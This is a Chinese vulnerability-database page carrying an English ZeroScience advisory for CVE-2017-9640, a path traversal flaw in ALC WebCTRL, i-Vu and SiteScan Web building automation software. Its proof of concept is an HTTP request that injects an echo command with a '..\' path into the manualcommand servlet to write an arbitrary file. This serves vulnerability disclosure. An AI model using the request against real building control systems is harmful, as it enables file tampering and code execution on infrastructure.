ALC WebCTRL、i-Vu和SiteScan Web 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124192 漏洞类型 路径遍历
发布时间 2017-08-22 更新时间 2019-10-17
CVE编号 CVE-2017-9640 CNNVD-ID CNNVD-201706-863
漏洞平台 Java CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/42543
https://cxsecurity.com/issue/WLB-2017080165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201706-863
|漏洞详情
ALC WebCTRL、i-Vu和SiteScan Web都是美国Automated Logic Corporation(ALC)公司的产品。ALC WebCTRL和i-Vu是楼宇自动化控制系统;SiteScan Web是一个Web站点。 ALC WebCTRL、i-Vu和SiteScan Web中存在路径遍历漏洞。攻击者可利用该漏洞覆盖文件,执行任意代码。以下产品和版本受到影响:ALC WebCTRL 6.1版本,6.0版本,5.5版本,5.2版本;i-Vu 6.1版本,5.5版本,5.2版本;SiteScan Web 6.1版本,5.5版本,5.2版本。
|漏洞EXP
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write


Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
                  ALC WebCTRL, i-Vu 6.0 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior

Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.

Desc: The vulnerability is triggered by an authenticated user that can use
the manualcommand console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using pre-defined set of commands. This
can be exploited by using the echo command to write and/or overwrite arbitrary
files on the system including directory traversal throughout the system.

Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.42
           CJServer/1.1
           Java/1.7.0_25-b17
           Java HotSpot Server VM 23.25-b01
           Ant 1.7.0
           Axis 1.4
           Trove 2.0.2
           Xalan Java 2.4.1
           Xerces-J 2.6.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php

CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640


30.01.2017

--


PoC:

GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET

---

GET http://TARGET/touch.txt HTTP/1.1

peend
|参考资料

来源:BID
链接:http://www.securityfocus.com/bid/100452
来源:MISC
链接:https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
来源:NSFOCUS
名称:37462
链接:http://www.nsfocus.net/vulndb/37462